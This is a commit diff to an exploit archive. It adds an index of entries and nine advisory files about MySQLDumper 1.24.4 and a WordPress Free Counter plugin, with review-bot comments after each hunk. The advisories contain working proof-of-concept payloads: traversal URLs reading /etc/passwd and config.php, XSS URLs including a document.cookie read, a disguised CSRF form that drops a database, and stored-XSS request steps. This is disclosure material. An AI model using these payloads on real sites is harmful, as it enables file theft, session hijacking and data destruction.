DB: 2015-05-28
9 new exploits
parent
8a28155962
commit
c2a15a0750
11 changed files with 184 additions and 6 deletions
15
files.csv
|
@ -78,7 +78,7 @@ id,file,description,date,author,platform,type,port
|
|||
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
|
||||
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
|
||||
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
|
||||
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
|
||||
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
|
||||
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
|
||||
82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
|
||||
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
|
||||
|
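Review bot: the new description for id 80 puts " - " between product and issue ("Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit"), but the context rows 77, 79 and 83 in this same hunk still run product and issue together, so the description column stays inconsistent for anyone searching or parsing titles. Either normalise those neighbouring rows in the same change or record the title convention where consumers of files.csv can find it.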
@ -13780,7 +13780,7 @@ id,file,description,date,author,platform,type,port
|
|||
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
|
||||
15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0
|
||||
15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
|
||||
15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0
|
||||
15879,platforms/windows/shellcode/15879.txt,"w32 speaking shellcode",2010-12-31,Skylined,windows,shellcode,0
|
||||
15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
|
||||
15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0
|
||||
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
|
||||
|
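Review bot: the rewritten description for id 15879, "w32 speaking shellcode", is now quoted like its neighbours but is still all lower case, unlike every other description in the hunk; capitalise it to match. The context lines also show id 15915 listed ahead of 15868, so the file is not sorted by id at this point, and it is worth confirming that nothing reading files.csv assumes it is.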
@ -26885,7 +26885,7 @@ id,file,description,date,author,platform,type,port
|
|||
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
|
||||
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
|
||||
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
|
||||
30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0
|
||||
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
|
||||
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
|
||||
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
|
||||
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
|
||||
|
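Review bot: the new description for id 30165 contains mis-decoded bytes ("Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP ..."): the character after "Ibrahim " has come out as "Ã?", which points to the title being read or written with the wrong character encoding. The old value stopped at "Ibrahim", so the non-ASCII character was already being mishandled before this change. Store the title as valid UTF-8, or transliterate it to ASCII, so that a search on the product name matches this row.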
@ -33504,3 +33504,12 @@ id,file,description,date,author,platform,type,port
|
|||
37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
|
||||
37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
|
||||
37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
|
||||
37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0
|
||||
37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0
|
||||
37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0
|
||||
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
|
||||
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
|
||||
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
|
|
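Review bot: row 37126 is filed as platforms/perl/webapps/37126.txt with platform "perl", while its description names install.php and the other seven MySQLDumper 1.24.4 rows added here (37125, 37127 to 37131, 37133) are all php/webapps. Unless there is a reason that is not visible in this hunk, move it to platforms/php/webapps and set the platform to php, so that a platform filter returns the whole set. Row 37132 is also the only added row with port 80, where every other webapps row in the hunk uses 0; pick one convention.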
|
15
platforms/perl/webapps/37126.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
|
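Review bot: the file header shows this advisory being created as an executable file, although it is a plain-text .txt with nothing to run, and the same is true of the other eight .txt files added in this commit. Add them with a non-executable mode (100644) so that nothing in an archive of exploit material carries an execute bit it does not need.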
15
platforms/php/webapps/37125.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
|
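Review bot: the body is the shared BID 53306 summary of five vulnerability classes, and nothing in it says which class the sample URL on the last line belongs to; a reader has to go back to files.csv to learn that this entry is the restore.php "filename" XSS. Add one line above the URL naming the affected script and parameter. The same text is repeated unchanged in 37126 to 37131 and 37133, so the point applies to each of them. The sample path also contains "/learn/cubemail/", which the text does not relate to MySQLDumper.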
15
platforms/php/webapps/37127.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
|
16
platforms/php/webapps/37128.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
|
16
platforms/php/webapps/37129.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
|
||||
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
|
17
platforms/php/webapps/37130.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/restore.php
|
||||
http://www.example.com/learn/cubemail/dump.php
|
||||
http://www.example.com/learn/cubemail/refresh_dblist.php
|
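Review bot: the three URLs at the end (restore.php, dump.php, refresh_dblist.php) are listed with no statement of what a direct request to them discloses, so the "Information Disclosure" in the files.csv title cannot be assessed or re-tested from this file alone. State what each script returns when requested directly and whether the request was authenticated.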
19
platforms/php/webapps/37131.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
|
||||
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
|
||||
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
|
||||
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
|
||||
</form>
|
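Review bot: the HTML sample posts to main.php?action=db&dbid=1 with a field named "kill1", but the text never says which main.php functions accept a request without an anti-CSRF token or what "kill1" does; the only hint is the alert string. Name the affected actions so that a fix can be checked against them. Minor: the img attribute is spelled "heigth", so it has no effect.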
41
platforms/php/webapps/37132.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
|
||||
# Date: 2015/05/25
|
||||
# Exploit Author: Panagiotis Vagenas
|
||||
# Contact: https://twitter.com/panVagenas
|
||||
# Vendor Homepage: http://www.free-counter.org
|
||||
# Software Link: https://wordpress.org/plugins/free-counter/
|
||||
# Version: 1.1
|
||||
# Tested on: WordPress 4.2.2
|
||||
# Category: webapps
|
||||
# CVE: CVE-2015-4084
|
||||
|
||||
1. Description
|
||||
|
||||
Any authenticated or non-authenticated user can perform a stored XSS
|
||||
attack simply by exploiting wp_ajax_nopriv_check_stat action.
|
||||
Plugin uses a widget to display website's visits, so any page that
|
||||
contains this widget will also load the malicious JS code.
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
* Send a post request to `http://www.free-counter.org/Api.php` in order
|
||||
to reveal the counter id of the vulnerable site. The POST data must
|
||||
contain the following vars:
|
||||
`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
|
||||
* As a response we get a serialized indexed array. The value that we
|
||||
need to know is the 'counter_id'.
|
||||
* Send a post request to
|
||||
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
|
||||
`action=check_stat&id_counter=<counter_id from step
|
||||
2>&value_=<script>alert(1)</script>`
|
||||
* Visit a page of the infected website that displays plugin's widget.
|
||||
|
||||
Note that the plugin uses the update_option function to store the
|
||||
$_POST['value_'] contents to DB so any code inserted there will be
|
||||
escaped. Even though a malicious user can omit the quotes in the src
|
||||
attr of the script tag. Most modern browsers will treat the tag as they
|
||||
were there.
|
||||
|
||||
3. Solution
|
||||
|
||||
No official solution yet exists.
|
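Review bot: in section 2 the third bullet asks for "counter_id from step 2", but the steps are unnumbered bullets; number them so the reference resolves. The closing note is hard to follow as written: it says content stored through update_option "will be escaped" and then that omitting the quotes gets around this, without saying what exactly is escaped. The header date (2015/05/25) also differs from the files.csv row for 37132 (2015-05-27); say which of the two is the disclosure date.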
15
platforms/php/webapps/37133.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
|
|
@ -194,6 +194,6 @@ snd=send(sock, exploit_code, strlen(exploit_code) , 0);
|
|||
Sleep(2000);
|
||||
closesocket(sock);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2003-08-13]
|
||||
}
|
||||
|
||||
// milw0rm.com [2003-08-13]
|
||||
|
|
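Review bot: the removed and added lines in this hunk read the same ("}", an empty line, "// milw0rm.com [2003-08-13]"), so this is presumably a whitespace or line-ending change at the end of the file, which the commit message ("9 new exploits") does not mention. If it is intentional normalisation, say so in the message or move it to its own commit so that it does not obscure the content changes.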